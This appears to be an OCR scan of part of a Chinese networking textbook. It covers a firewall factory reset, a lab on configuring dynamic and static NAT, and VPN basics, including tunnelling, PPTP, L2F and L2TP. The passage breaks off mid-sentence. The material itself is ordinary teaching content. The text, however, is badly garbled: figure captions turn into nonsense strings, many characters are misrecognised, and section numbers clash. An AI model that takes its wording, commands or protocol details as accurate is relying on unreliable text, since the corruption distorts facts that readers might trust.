。 恢 复出 厂 配置 ,在 执行 模式 下 ,使 用 以 下 命令 : ruleconfig load default. 如 图 7-35 
所 示 。 


# ruleconfig load default 
NO o ni-eemfiguration will be lost after factory one 


~ i ored. It 
s better to save your current configuration first. Are you ready? v/n]) 
100% Rules loaded successfully? 


图 7-35 恢复 出 厂 默认 配置 


此 时 防火 墙 将 恢复 到 出 厂 默 认 配 置 ,并 自动 重启 设备 。 


&u 7.0 防火 墙 NAT 配置 


【 实 训 目的 】 

考虑 到 公 网 地 址 的 有 限 ,不 能 每 台 PC 都 配置 公 网 地 址 访问 外 网 ; 通过 少量 公 网 IP 地 
址 来 满足 多 数 私 网 IP 上 网 ,以 缓解 IP 地 址 枯竭 的 速度 。 

防火 墙 上 配置 了 SNAT 后 ,内 部 用 户 在 访问 外 网 时 都 隐藏 了 私 网 地 址 ,如 果 防 火 墙 内 
部 有 一 台 服 务 器 需要 对 外 网 用 户 开放 ,此 时 就 必须 在 防火 墙 上 配置 DNAT, 将 数据 包 在 防 
火 墙 做 目的 地 址 转换 ,让 外 网 用 户 访问 到 该 服务 器 。 
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【 实 训 环境 】 

拓扑 结构 参考 图 7-17。 

【 实 训 内 容 】 

(1) 配置 动态 NAT。 参考 表 7-1 中 的 @, 动 态 NAT 配置 如 图 7-36 和 图 7-37 所 示 。 


W1800E 
神州 数码 防火 寺 


COOLED 


起 内地 址 ; 202.101. 1.253 Bü: 192.188.1.0 
ee LI 0.0.0.0. 


cm cmi it0 (10.1. 157.131) yj 


[2 d 

1800s ARMEA ENEN: 

[E RRAN M ERRA hE] 
1800E FRAIRE FEH ht i HR 
AURGE1800E D) AXI, HARRERA piii, TUE R i gon 
HAMA BKAKA Apt, HERETER, 

Au RUE1800s D) AA, HAs FARA hpi RA, WAAR 
BJR, HAET AE E MRA h); 

HFAA k, WRAAD A Eph, HAAA ER BRAA phit, HUE 
BAA RAH hh 


图 7-37 动态 NAT 配置 注意 事项 


(2) 静态 NAT 配置 。 静态 NAT 配置 如 图 7-38 和 图 7-39 所 示 。 


Wz1800E 
神州 数码 防火 培 


BAUR OBS HAS 


meng 


(02. 101. 1.262 (1.1. [io (202.101.1.253 司 


图 7-38 静态 NAT 配置 
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图 7-39 需要 配置 的 静态 NAT 
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虚拟 专用 网 络 


VPN 的 英文 全 称 是 virtual private network ,翻译 过 来 就 是 “虚拟 专用 网 络 ”。 本 章 介绍 
VPN 的 基本 概念 、 分 类 关键 技术 和 安全 协议 ,重点 介绍 Windows Server 2003 的 VPN 实 


现 和 硬件 VPN. 


@.1 VPN 的 基本 概念 


随 着 互联 网 的 兴起 ,企业 开始 寻求 利用 互联 网 来 扩展 网 络 。 首 先 出 现 的 是 Intranet( 企 
业内 部 互联 网 ), 这 是 一 种 专 供 公司 员工 使 用 而 设计 的 站 点 , 受 密码 保护 。 现 在 ,很 多 公司 都 


搭建 了 自己 的 VPN ,以 满足 远程 员工 和 分 公司 的 需求 。 
从 原理 上 来 说 ,VPN 就 是 利用 公用 网 络 把 远程 站 点 或 用 户 连 接 到 一 起 的 专用 网 


络 。 与 


使 用 实际 的 专用 连接 (例如 租用 线路 ) 不 同 ,VPN 使 用 的 是 通过 互联 网 路 由 的 “虚拟 ”连接 ， 


把 公司 的 专用 网 络 同 远程 站 点 或 员工 连接 到 一 起 。 一 个 典型 的 VPN 可 能 包括 公司 


总 部 的 


E LAN ,远程 分 公司 或 分 支 机 构 的 其 他 LAN. 以 及 从 网 络 外 部 连接 进来 的 个 人 


上 户 , 如 


图 8-1 所 示 。 


A 


生意 伙伴 移动 Lj" 
工作 人 员 


8-1 一 个 典型 的 VPN 


VPN 是 近年 来 随 着 Internet 的 广泛 应 用 而 迅速 发 展 起 来 的 一 种 新 技术 ,实现 在 公共 网 


络 上 构建 私人 专用 网 络 .“ 虚 拟 ? 主 要 是 指 这 种 网 络 是 一 种 逻辑 上 的 网 络 。 
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VPN 对 用 户 透 明 ,用 户 感觉 不 到 其 存在 ,就 好 像 使 用 了 一 条 专用 线路 在 自己 的 计算 机 
和 远程 的 企业 内 部 网 络 之 间 , 或 者 在 两 个 异地 的 内 部 网 络 之 间 建 立 连接 ,以 进行 数据 的 安全 
传输 。 虽然 VPN 建立 在 公共 网 络 的 基础 上 ,但 是 用 户 在 使 用 VPN 时 感觉 如 同 在 使 用 专用 
网 络 进行 通信 ,所 以 称 之 为 “虚拟 "专用 网 络 , 如 图 8-2 所 示 。 


安全 网 关 Mx A 
TTT Ta 

37 AA 
Ce g i BASHA 


图 8-2 VPN 连接 示意 图 


VPN 可 以 通过 特殊 的 加 密 的 通信 协议 在 连接 在 Internet 上 的 位 于 不 同 地 方 的 两 个 或 
多 个 企业 内 部 网 之 间 建 立 一 条 专 有 的 通信 线路 ,就 好 比 是 架设 了 一 条 专线 一 样 ,但 是 它 并 不 
需要 真正 地 去 铺设 光缆 之 类 的 物理 线路 。 这 就 好 比 去 电信 和 局 申请 专线 ,但 是 不 用 给 铺设 线 
路 的 费用 ,也 不 用 购买 路 由 器 等 硬件 设备 。 一 句 话 ,VPN 的 核心 就 是 在 利用 公共 网 络 建立 
虚拟 私有 网 络 。 

VPN 是 依靠 ISP(Internet 服务 提供 商 ) 和 其 他 NSP( 网 络 服务 提供 商 ), 在 公用 网 络 中 
建立 专用 的 数据 通信 网 络 的 技术 ,如 图 8-3 所 示 。 


VPNE hs 


图 8-3 在 公 网 中 建立 的 虚拟 专用 数据 通信 网 络 


在 该 网 中 的 主机 将 不 会 觉察 到 公共 网 络 的 存在 ,仿佛 所 有 的 主机 都 处 于 一 个 网 络 之 中 。 
公共 网 络 仿佛 是 只 由 本 网 络 在 独占 使 用 ,VPN 使 用 户 节 省 了 租用 专线 的 费用 。 除 了 购买 
VPN 设备 外 ,企业 所 付出 的 仅仅 是 向 企业 所 在 地 ISP 支付 一 定 的 上 网 费用 ,也 节省 了 长 途 
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电话 费 。 

VPN 被 定义 为 通过 一 个 公用 网 络 ( 通 常 是 因特网 ) 建 立 一 个 临时 的 、 安 全 的 连接 ,是 一 
条 穿 过 混乱 的 公用 网 络 的 安全 ,稳定 的 隧道 。 使 用 这 条 隧道 可 以 对 数据 进行 几 倍 加 密 达 到 
安全 使 用 互联 网 的 目的 ,如 图 8-4 所 示 。 


使 用 PPTP 或 ISP 的 PPP 使 用 PPTP 或 L2TP 企业 专 月 
L2TP 的 VPN 连 接 服务 器 的 VPN 服 务 器 网 络 
图 8-4 VPN 隧道 


8.2 VPN 的 分 类 
wt 


VPN 有 三 种 类 型 : 远程 访问 虚拟 网 (Access VPN) ,企业 内 部 虚拟 网 (Intranet VPN), 
企业 扩展 虚拟 网 (Extranet VPN)。 


8.2.1 远程 访问 虚拟 网 


远程 访问 虚拟 网 也 称 为 虚拟 专用 拨号 网 络 (VPDN) ,是 一 种 用 户 到 LAN 的 连接 ,通常 
用 于 员工 需要 从 各 种 远程 位 置 连接 到 的 专用 网 络 。 一 般 来 说 ,公司 都 会 把 搭建 大 型 远程 访 
E VPN 的 工作 外 包 给 企业 服务 提供 商 (ESP)。ESP 首先 建立 一 个 网 络 访问 服务 器 
(NAS) ,并 向 远程 用 户 提供 用 于 他 们 计算 机 的 桌面 客户 端 软件 。 然 后 ,远程 工作 者 通过 拨 
打 免 费 号 码 连接 NAS, 并 使 用 他 们 的 VPN 客户 端 软件 访问 公司 网 络 。 典 型 的 需要 使 用 远 
程 访问 VPN 的 公司 是 拥有 数 百 个 销售 人 员 的 大 型 公司 。 远 程 访 问 VPN 能 够 通过 第 三 方 
服务 提供 商 在 公司 专用 网 络 和 远程 用 户 之 间 实 现 加 密 的 安全 连接 ,如 图 8-5 所 示 。 


防火 墙 
图 8-5 远程 访问 虚拟 网 
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利用 专用 设备 和 大 规模 加 密 , 公 司 可 以 通过 公用 网 络 连 接 到 多 个 固定 的 站 点 。 
8.2.2 企业 内 部 虚拟 网 


基于 Intranet 一 一 如 果 公 司 有 一 个 或 多 个 远程 位 置 想 要 加 入 到 一 个 专用 网 络 中 ,可 以 
建立 一 个 Intranet VPN。 将 LAN 连接 到 另 一 个 LAN, 称 为 企业 内 部 虚拟 网 (Intranet 
VPN) ,如 图 8-6 所 示 。 


网 关 VPN 网 关 VPN 
图 8-6 企业 内 部 虚拟 网 


8.2.3 企业 扩展 虚拟 网 


基于 Extranet 一 一 如 果 公司 同 其 他 公司 (例如 合作 伙伴 、 供 应 商 或 客户 ) 的 关系 紧密 ,他 
们 可 以 建立 一 个 Extranet VPN, 以 便 将 LAN 连接 到 另 一 个 LAN ,同时 让 所 有 公司 都 能 在 
一 个 共享 环境 中 工作 , 称 为 企业 扩展 虚拟 网 (Extranet VPN) ,如 图 8-7 所 示 。 


加 密 隧道 


站 点 到 站 点 


网 络 访问 人 


VPN 网 关 
远程 用 户 


外 联网 


图 8-7 企业 扩展 虚拟 网 


VPN 是 对 Intranet 的 扩展 , 它 可 以 帮助 远程 用 户 、 公 司 分 支 机 构 、 商 业 伙伴 及 供应 商 同 
公司 的 Intranet 建立 可 信 的 安全 连接 ,并 保证 数据 的 安全 传输 。VPN 可 用 于 不 断 增长 的 移 
动用 户 的 全 球 因 特 网 接 入 ,以 实现 安全 连接 ; 可 用 于 实现 企业 网 站 之 间 安 全 通信 的 虚拟 专 
用 线路 ; 可 用 于 有 效 地 连接 到 商业 伙伴 和 用 户 的 安全 外 联网 VPN. 一 家 企业 可 以 同时 提 
供 3 种 VPN 服务 ,如 图 8-8 所 示 。 
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Intranet VPN 
。 利 用 低 成 本 的 隧 
道 技术 连接 至 多 SEINS 
种 VPN 服 务 (如 ame 公 室 
IPSec 加 密 和 QoS)， 
以 确保 实现 可 靠 
WAER 
。 通 过 帧 中 继 和 各 
用 线路 节约 成 本 
远 
远程 访问 VPN 
。 在 公用 互联 网 和 
AN 客户 端 软件 之 间 
商业 伙伴 Bude. uH 
o 可靠 的 L3 安 全 移动 员工 缩 的 加 密 隧道 
性 员工 |。 通 过 使 用 免费 号 
码 节约 成 本 


图 8-8 企业 提供 的 VPN 服务 


6.3 VPN 的 功能 特性 


VPN 系统 的 功能 特性 可 以 概括 为 以 下 几 个 主要 方面 。 

(OD 安全 保障 。 实 现 VPN 的 技术 和 模式 很 多 ,但 所 有 的 VPN 均 应 保证 通过 公用 网 络 
平台 传输 数据 的 专用 性 和 安全 性 。 在 面向 非 连 接 的 公用 IP 网 络 上 建立 一 个 逻辑 的 、 点 对 点 
的 连接 , 称 为 建立 一 个 隧道 ,可 以 利用 加 密 技术 对 经 过 隧道 传输 的 数据 进行 加 密 , 以 保证 数 
据 仅 被 指定 的 发 送 者 和 接收 者 了 解 , 从 而 可 保证 数据 的 私有 性 和 安全 性 ; 在 安全 性 方面 ,由 
F VPN 直接 构建 在 公用 网 上 ,其 安全 问题 也 更 为 突出 。 企 业 必须 确保 其 VPN 上 传送 的 数 
据 不 被 攻击 者 窥视 和 复 改 ,并 且 要 防止 非法 用 户 对 网 络 资源 或 私有 信息 的 访问 。Extranet 
VPN 将 企业 网 扩展 到 合作 伙伴 和 客户 ,对 安全 性 提出 了 更 高 的 要 求 。 

(2) 服务 质量 保证 。VPN 为 企业 数据 提供 不 同等 级 的 QoS, 不 同 的 用 户 和 业务 对 QoS 
的 要 求 差别 较 大 。 对 于 移动 办 公用 户 ,提供 广 泛 的 连接 和 覆盖 性 是 保证 VPN 服务 的 一 个 
重要 因素 ; 对 于 拥有 众多 分 支 机 构 的 专线 VPN 网 络 , 交 互 式 的 内 部 企业 网 应 用 则 要 求 网 络 
能 提供 良好 的 稳定 性 ; 对 于 视频 等 其 他 应 用 则 对 网 络 提出 了 明确 的 要 求 ,如 网 络 时 延 及 误 
码 率 等 。 所 有 以 上 网 络 应 用 均 要 求 网 络 根据 需要 提供 不 同等 级 的 QoS。 

在 网 络 优化 方面 ,构建 VPN 的 另 一 重要 需求 是 充分 利用 广域网 资源 ,为 重要 数据 提供 
可 靠 的 带宽 。 广 域 网 流量 的 不 确定 性 使 其 带宽 的 利用 率 很 低 , 在 流量 高 峰 时 引起 网 络 阻塞 ， 
产生 网 络 瓶颈 ,使 实时 性 要 求 高 的 数据 得 不 到 及 时 发 送 ; 而 在 流量 低谷 时 又 造成 大 量 的 带 
SES fH. QoS 通过 流量 预测 与 流量 控制 策略 ,按照 优先 级 分 配 带宽 资源 ,实现 带宽 管理 ,使 
各 类 数据 被 合理 地 先后 发 送 , 预 防 阻塞 发 生 。 

(3) 可 扩充 性 和 灵活 性 。VPN 必须 能 够 支持 通过 Intranet 和 Extranet 的 任何 类 型 的 
数据 流 , 方 便 增加 新 的 节点 ,支持 多 种 类 型 的 传输 媒介 ,可 以 满足 同时 传输 语音 、 图 像 和 数据 
等 新 应 用 对 高 质量 传输 以 及 带宽 增加 的 需求 。 

(4) 可 管理 性 。 从 用 户 角度 和 运营 角度 看 ,VPN 要求 企 业 将 其 网 络 管理 功能 从 局 域 网 
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无 颖 除 地 延伸 到 公用 网 ,甚至 是 客户 和 合作 伙伴 ; 可 以 将 一 些 次 要 的 网 络 管理 任务 交 给 服 
务 提供 商 去 完成 ,企业 自己 仍 需要 完成 许多 网 络 管理 任务 。VPN 管理 目标 : 减 小 网 络 风 
险 ,使 其 具有 高 扩展 性 、 经 济 性 、 高 可 靠 性 等 ; VPN 管理 内 容 : 安全 管理 .设备 管理 ,配置 管 
H ACL 管理 .QoS 管理 等 。 

(5) 降低 成 本 。VPN 利用 现 有 的 Internet 或 其 他 公共 网 络 的 基础 设施 为 用 户 创建 安 
全 隧道 ,不 需要 专门 租用 线路 ,节省 了 专线 的 租金 。 如 果 是 采用 远程 拨号 进入 内 部 网 络 , 访 
问 内 部 资源 ,需要 长 途 话费 ; 而 采用 VPN 技术 ,只 需 氢 入 当地 的 ISP 就 可 以 安全 地 接 人 内 
部 网 络 ,这 样 也 节省 了 线路 话费 。 


6.4 VPN 的 原理 与 协议 


VPN 技术 非常 复杂 ,但 实现 VPN 的 主要 技术 及 相关 协议 已 经 成 熟 , 尤 其 以 L2TP、 
IPSec 和 SSL 协议 应 用 最 广 。VPN 使 用 三 个 方面 的 技术 保证 通信 的 安全 性 : 身份 验证 、 隧 
道 协议 ,数据 加 密 。 


8.4.1 VPN 的 一 般 验 证 流程 


VPN 的 一 般 验 证 流程 如 下 : 

(1) 客户 机 向 VPN 服务 器 发 出 请 求 ,VPN 服务 器 响应 请 求 并 向 客户 机 发 出 身份 质询 。 

(2) 客户 机 将 加 密 的 响应 信息 发 送 到 VPN 服务 器 。 

(3) 如 果 账 户 有 效 ,VPN 服务 器 将 检查 该 用 户 是 否 具有 远程 访问 权限 。 

(4) 如 果 该 用 户 拥有 远程 访问 的 权限 ,VPN 服务 器 接受 此 连接 。 

(5) 在 身份 验证 过 程 中 产生 的 客户 机 和 服务 器 公有 密 钥 将 用 来 对 数据 进行 加 密 。 

身份 认证 技术 ,是 在 计算 机 网 络 中 确认 操作 者 身份 而 产生 的 解决 方法 。 计 算 机 网 络 世 
界 中 一 切 信息 包括 用 户 的 身份 信息 都 是 用 一 组 特定 的 数据 来 表示 的 ; 计算 机 只 能 识别 用 户 
的 数字 身份 ,对 用 户 的 授权 也 是 针对 用 户 数 字 身 份 的 授权 ; 如 何 保证 以 数字 身份 进行 操作 
的 操作 者 就 是 这 个 数字 身份 合法 拥有 者 , 即 保证 操作 者 的 物理 身份 与 数字 身份 相对 应 。 为 
了 解决 这 个 问题 ,身份 认证 技术 作为 防护 网 络 资产 的 第 一 道 关 口 , 有 着 举足轻重 的 作用 。 


8.4.2 隧道 


下 面 介绍 关于 隧道 的 相关 概念 。 

。 VPN 的 核心 是 被 称 为 "隧道 (tunneling) ”的 技术 。 

。 隧道 技术 是 一 种 通过 使 用 互联 网 络 的 基础 设施 在 网 络 之 间 传 递 数据 的 方式 。 

* 使 用 隧道 传递 的 数据 (或 负载 ) 可 以 是 不 同 协议 的 数据 帧 或 包 , 隧 道 协议 将 这 些 其 他 
协议 的 数据 帧 或 包 重新 封装 在 新 的 包头 中 发 送 。 

。 被 封装 的 数据 包 在 公共 互联 网 络 上 传递 时 所 经 过 的 逻辑 路 径 称 为 隧道 ,如 图 8-9 
所 示 。 

隧道 技术 是 一 种 通过 使 用 互联 网 络 的 基础 设施 在 网 络 之 间 传 递 数据 的 方式 。 使 用 隧道 

传递 的 数据 (或 负载 ) 可 以 是 不 同 协议 的 数据 帧 或 包 。 隧 道 协议 将 这 些 其 他 协议 的 数据 帧 或 
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包 重 新 封装 在 新 的 包头 中 发 送 。 新 的 包头 提供 了 路 由 信息 ,从 而 使 封装 的 负载 数据 能 够 通 
过 互联 网 络 传递 。 

被 封装 的 数据 包 在 隧道 的 两 个 端点 之 间 通 过 公共 互联 网 络 进行 路 由 。 被 封装 的 数据 包 
BIG E 旦 到 达 网 络 终点 ,数据 将 被 解 包 
并 转发 到 最 终 目的 地 。 


8.4.3 加密 


加 密 的 基本 思想 是 在 协议 栈 的 任意 层 对 数据 或 报 文 头 进行 加 密 ,由 于 所 选 算法 极为 保 
密 , 故 难以 破解 ,从 而 有 效 保 护 传输 的 信息 。 考 虑 到 该 技术 已 经 成 熟 且 广泛 应 用 于 诸多 领域 
的 信息 加 密 传输 ,VPN 可 直接 利用 现 有 加 密 技术 。 

由 于 VPN 实际 上 是 通过 软件 实现 的 技术 ,因此 VPN 加 密 的 载体 也 是 多 方面 的 ,包括 
路 由 器 (路 由 器 实现 VPN 功能 ) .防火 墙 (防火 墙 实 现 VPN 功能 ) .专用 VPN 硬件 (加 密 通 
过 硬件 实现 ,提高 安全 效率 )。VPN 加 密 技 术 发 展 趋势 是 实现 端 到 端的 安全 ,这 样 才能 真正 
确保 完全 的 加 密 。 


8.4.A4 实现 VPN 的 隧道 技术 


为 了 能 在 公 网 中 形成 企业 专用 的 链 路 网 络 , VPN 采用 了 Tunneling 技术 ,模拟 点 到 点 
连接 技术 ,依靠 ISP 和 其 他 的 网 络 服务 提供 商 在 公 网 中 建立 自己 专用 的 Tunneling, 让 数据 
包 通 过 隧道 传输 。 

网 络 隧道 技术 是 利用 一 种 网 络 协议 传输 另 一 种 网 络 协议 ,也 就 是 将 原始 网 络 信息 进行 
再 次 封装 ,并 在 两 个 端点 之 间 通 过 公共 互联 网 络 进行 路 由 ,从 而 保证 网 络 信息 传输 的 安全 
性 。 它 主要 利用 网 络 隧 道 协 议 来 实现 这 种 功能 ,具体 包括 第 二 层 隧 道 协议 和 第 三 层 隧道 
协议 。 

第 二 层 隧道 协议 ,在 链 路 层 进行 , 先 把 各 种 网 络 协议 封装 到 PPP 包 中 ,再 把 整个 数据 包 
装 人 隧道 协议 中 ,这 种 经 过 两 层 封 装 的 数据 包 由 第 二 层 协议 进行 传输 。 第 二 层 隧 道 协议 有 
以 下 几 种 : PPTP (point-to-point tunneling protocol), L2F (layer 2 forwarding), L2TP 
(layer two tunneling protocol) 。 


第 三 层 隧道 协议 ,在 网 络 层 进行 ,把 各 种 网 络 协议 直接 装 入 隧道 协议 中 ,形成 的 数据 包 
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依靠 第 三 层 协议 进行 传输 。 第 三 层 隧道 协议 有 以 下 几 种 : IPSecCIP security) 是 目前 最 常用 
的 VPN 解决 方案 ,GRE(general routing encapsulation) 。 

隧道 技术 包括 数据 封装 .传输 和 解 包 在 内 的 全 过 程 。 

封装 是 构建 隧道 的 基本 手段 , 它 使 得 IP 隧道 实现 了 信息 隐蔽 和 抽象 。 封 装 器 建立 封装 
报头 ,并 将 其 追加 到 纯 数据 包 的 前 面 。 当 封装 的 数据 包 到 达 解 包 器 时 ,封装 报头 被 转换 回 纯 
报头 ,数据 包 被 传送 到 目的 地 。 

隧道 的 封装 具有 以 下 特点 : 源 实体 和 目的 实体 不 知道 任何 隧道 的 存在 ; 在 隧道 的 两 个 
端点 使 用 该 过 程 ,需要 封装 器 和 解 包 器 两 个 新 的 实体 ; 封装 器 和 解 包 器 必须 相互 知晓 ,但 不 
必 知 道 在 它们 之 间 的 网 络 上 的 任何 细节 。 


8.4.5 PPTP 协议 


点 对 点 隧道 协议 (PPTP) 是 常用 的 协议 ,主要 是 因为 微软 的 服务 器 操作 系统 占有 很 大 
的 市 场 份额 。PPTP 是 点 对 点 协议 (PPP) 的 扩展 ,而 PPP 是 为 在 串 行 线路 上 进行 氢 入 访问 
而 开发 的 。PPTP 在 Windows 2000 中 已 完全 实现 , 它 将 PPP 帧 封装 成 IP 数据 报 ,以 便 在 
基于 IP 的 互联 网 上 传输 。 

PPTP 允许 对 多 协议 通信 进行 加 密 , 然 后 封装 在 IP 标 头 中 ,以 通过 IP 网 络 发 送 。 
PPTP 可 以 用 于 远程 访问 连接 和 站 点 到 站 点 的 VPN 连接 ,使 用 Internet 作为 VPN 的 公用 
网 络 时 ,PPTP 服务 器 是 启用 PPTP 的 VPN 服务 器 ,一 个 接口 在 Internet. 上 , 另 一 个 接口 在 
Intranet 上 。 

PPTP 将 PPP 帧 封装 在 IP 数据 报 中 ,以 便 通过 网 络 传输 。PPTP 使 用 TCP 连接 进行 
隧道 管理 ,使 用 修订 版 的 通用 路 由 封装 (GRE) 封 装 隧道 数据 的 PPP 帧 。 封 装 的 PPP 帧 的 
有 效 负 载 可 以 加 密 、 压 缩 或 加 密 并 压缩 。 图 8-10 所 示 为 包含 IP 数据 报 的 PPTP 数据 包 的 
结构 。 


已 加 密 


耳 标 头 |GRE 标 头 | PPP 标 头 PPP 负 载 (IP 数 据 报 ) 


PPP 帧 


一 - 


图 8-10 PPTP 数据 包 结构 


可 使 用 MS-CHAP V2 或 EAP-TLS 身份 验证 进程 生成 的 加 密 密 钥 ,通过 微软 点 对 点 加 
密 (MPPE) 对 PPP 帧 进行 加 密 。VPN 客户 端 只 有 使 用 MS-CHAP V2 或 EAP-TLS 身份 验 
证 协议 才能 对 PPP 帧 的 有 效 负载 进行 加 密 。PPTP 利用 基础 PPP 加 密 并 封装 以 前 加 密 的 
PPP 帧 。 


8.4.6 L2F 协议 


L2F 是 Cisco 公司 提出 的 隧道 技术 。 作 为 一 种 传输 协议 ,L2F 支持 拨号 接 人 服务 器 ,将 
拨号 数据 流 封装 在 PPP 帧 内 通过 广域网 链 路 传送 到 L2F 服务 器 (路 由 器 )。L2F 服务 器 把 
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数据 包 解 包 之 后 重新 注入 网 络 。 与 PPTP 和 L2TP 不 同 ,L2F 没有 确定 的 客户 方 。 注 意 ， 
L2F 只 在 强制 隧道 中 有 效 。 


8.4.7 L2TP 协议 


根据 IETF 提供 的 设计 标准 协议 的 建议 ,微软 和 Cisco 设计 了 第 二 层 隧道 协议 (L2TP)。 
后 来 ,IETF 采纳 这 一 协议 ,现代 的 L2TP 结合 了 PPTP 和 Cisco 的 L2F 协议 。 


1. L2TP 协议 的 基本 原理 


L2TP 是 一 种 基于 PPP 的 二 层 隧 道 协议 。 在 由 L2TP 构建 的 VPN 中 ,有 两 种 类 型 的 
服务 器 ,一 种 是 L2TP 访问 集中 器 (L2TP access concentrator, LAC) , 它 是 附属 在 网 络 上 的 
具有 PPP 端 系统 和 L2TP 协议 处 理 能 力 的 设备 ,LAC 是 一 个 网 络 接 人 服务 器 ,为 用 户 提供 
网 络 接 人 服务 ; 另 一 种 是 L2TP 网 络 服务 器 (L2TP network server,LNS) ,是 PPP 端 系统 
上 用 于 处 理 L2TP 协议 服务 器 端 部 分 的 软件 。 

在 LNS 和 LAC 之 间 存 在 两 种 类 型 的 连接 ,一 种 是 Tunneling 连接 , 它 定义 了 一 个 
LNS fll LAC 对 ; 另 一 种 是 会 话 (session) 连 接 , 它 复 用 在 隧道 连接 之 上 ,用 于 表示 承载 在 隧 
道 连接 中 的 每 个 PPP 会 话 过 程 。 

L2TP 连接 的 维护 以 及 PPP 数据 的 传送 都 是 通过 L2TP 消息 的 交换 来 完成 的 ,L2TP 
消息 可 以 分 为 两 种 类 型 ,一 种 是 控制 消息 , 另 一 种 是 数据 消息 。 控 制 消息 用 于 隧道 连接 和 会 
话 连接 的 建立 与 维护 ,数据 消息 用 于 承载 用 户 的 PPP 会 话 数 据 包 。 这 些 消 息 都 通过 UDP 
的 1701 端口 承载 于 TCP/IP 之 上 。 


2. L2TP 协议 的 网 络 组 件 


在 L2TP 构建 的 VPN 中 ,网 络 组 件 包括 以 下 三 个 部 分 。 

(1) 远 端 系统 ,是 要 接 人 VPDN 网 络 的 远 地 用 户 和 远 地 分 支 机 构 , 通 常 是 一 个 拨号 用 
户 的 主机 或 私有 网 络 的 一 台 路 由 设备 。 

(2) LAC ,是 附属 在 交换 网 络 上 的 具有 PPP 端 系统 和 L2TP 协议 处 理 能 力 的 设备 , 通 
常 是 一 个 当地 ISP 的 NAS, 用 于 为 PPP 类 型 的 用 户 提供 接 人 服务 。LAC 位 于 LNS 和 远 端 
系统 之 间 , 用 于 在 LNS 和 远 端 系统 之 间 传 递 信息 包 。 它 把 从 远 端 系统 收 到 的 信息 包 按 昭 
L2TP 协议 进行 封装 并 送 往 LNS, 同 时 也 将 从 LNS 收 到 的 信息 包 进行 解 封装 并 送 往 远 端 系 
统 。LAC 与 远 端 系统 之 间 采 用 本 地 连接 或 PPP. 链 路 ,VPN 应 用 中 通常 为 PPP 链 路 。 

(3) LNS, 既 是 PPP 端 系统 ,又 是 L2TP 协 议 的 服务 器 端 ,通常 作为 一 个 企业 内 部 网 的 
边缘 设备 。LNS 作为 L2TP 隧道 的 另 一 侧 端点 ,是 LAC 的 对 端 设备 ,是 LAC 进行 隧道 传 
输 的 PPP 会 话 的 逻辑 终止 端点 。 通 过 在 公 网 中 建立 L2TP 隧道 ,将 远 端 系统 的 PPP 连接 的 
男 一 端 由 原来 的 LAC 在 逻辑 上 延伸 到 了 企业 网 内 部 的 LNS. 

L2TP 是 PPTP 和 L2F 的 组 合 , 微 软 实 现 的 L2TP 依靠 IPSec 传输 模式 来 提供 加 密 服 
务 。L2TP 和 IPSec 的 组 合 称 为 L2TP/IPSec. VPN 客户 端 和 VPN 服务 器 均 支 持 L2TP 和 
IPSec, VPN 客户 端 支持 内 置 在 Windows XP 等 远程 访问 客户 端 中 ,VPN 服务 器 支持 内 置 
在 Windows Server 2003 系列 的 成 员 中 。 
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3. L2TP 协议 的 结构 


图 8-11 描述 了 控制 通道 以 及 PPP. 帧 和 数据 通道 之 间 的 关系 。PPP 帧 在 不 可 靠 的 
L2TP 数据 通道 上 进行 传输 ,控制 消息 在 可 靠 的 L2TP 控制 通道 内 传输 。 


PPP 帧 


L2TP 数 据 消息 L2TP 控 制 消息 
L2TP 数 据 通 道 L2TP 控 制 通道 
(不 可 靠 ) (可 靠 ) 
数据 包 传输 网 络 


图 8-11 L2TP 协议 的 结构 


图 8-12 描述 了 LAC 与 LNS 之 间 的 L2TP 数据 包 的 封装 结构 。 通 常 L2TP 数据 以 
UDP 报 文 的 形式 发 送 ; L2TP 注册 了 UDP1701 端口 ,但 是 这 个 端口 仅 用 于 初始 的 隧道 建立 
过 程 中 ; L2TP 隧道 发 起 方 任 选 一 个 空闲 的 端口 向 接收 方 的 1701 端口 发 送 报 文 ; 接收 方 收 
到 报 文 后 ,也 任 选 一 个 空闲 的 端口 ,给 发 送 方 的 指定 端口 回 送 报 文 。 至 此 ,双方 端口 选 定 ,并 
在 隧道 保持 连通 的 时 间 段 内 不 再 改变 。 

PPP 帧 (IP 数据 报 ) 使 用 L2TP 标 头 和 UDP 标 头 封装 。 包 含 数据 报 的 L2TP 数据 
包 的 结构 如 图 8-12 所 示 。 


| mti. | UDP 标 头 | L2TP 标 头 | PPP 标 头 | PPP 负 载 (IP 数据 报 ) 


i | PPPH .| 


L2TP 帧 


UDP 帧 


图 8-12 L2TP 数据 包 的 结构 


L2TP 使 用 以 下 两 种 信息 类 型 : 控制 信息 和 数据 信息 。 控 制 信息 用 于 隧道 和 呼叫 的 建 
立 、 维 持 和 清除 ,数据 信息 用 于 封装 隧道 所 携带 的 PPP 帧 ; 控制 信息 利用 L2TP 中 的 一 个 可 
靠 控 制 通道 来 确保 发 送 。 当 发 生 包 丢失 时 ,不 转发 数据 信息 。 应 用 L2TP 协议 所 构建 的 虚 
拟 专用 网 络 如 图 8-13 所 示 。 


远程 用 户 
1 
O i 
= | 企业 内 部 网 
LAC i 
LNS 1 
PSTN L2TP | 
Internet 1 
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L2TP 构 建 的 VPN 


图 8-13 L2TP 构 建 的 VPN 
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4. L2TP 构建 VPN 的 优势 


L2TP 构建 VPN 的 优势 如 下 。 

(1) 灵活 的 身份 验证 机 制 以 及 高 度 的 安全 性 。L2TP 是 基于 PPP 的 , 它 继承 了 PPP 的 
所 有 安全 特性 ,并 且 还 对 隧道 端点 进行 验证 ,使 得 通过 L2TP 传输 的 数据 难以 被 攻击 ; 根据 
特定 的 网 络 安全 要 求 ,还 可 以 在 L2TP 之 上 采用 隧道 加 密 、 端 对 端 数据 加 密 或 应 用 层 数 据 加 
密 等 来 提高 数据 的 安全 性 。 

(2) 内 部 地 址 分 配 支持 。LNS 可 以 放置 于 企业 网 的 防火 墙 之 后 , 它 可 以 对 远 端 用 户 的 
地 址 进行 动态 的 分 配 和 管理 ,可 以 支持 DHCP 和 私有 地 址 应 用 。 远 端 用 户 所 分 配 的 地 址 不 
是 Internet 地 址 而 是 企业 内 部 的 私有 地 址 ,这 样 方便 了 地 址 的 管理 并 可 以 增加 安全 性 。 

(3) 网 络 计 费 的 灵活 性 。 可 以 在 LAC 和 LNS 两 处 同时 计 费 , 即 ISP 处 和 企业 处 。 
L2TP 提供 数据 传输 的 出 入 包 数 , 字 节 数 及 连接 的 起 始 、 结 束 时 间 等 计 费 数据 ,可 以 根据 这 
些 数据 方便 地 进行 网 络 计 费 。 

(D 可 靠 性 。L2TP 协议 可 以 支持 备份 LNS, 当 一 个 主 LNS 不 可 达 之 后 ,LAC 可 以 重 
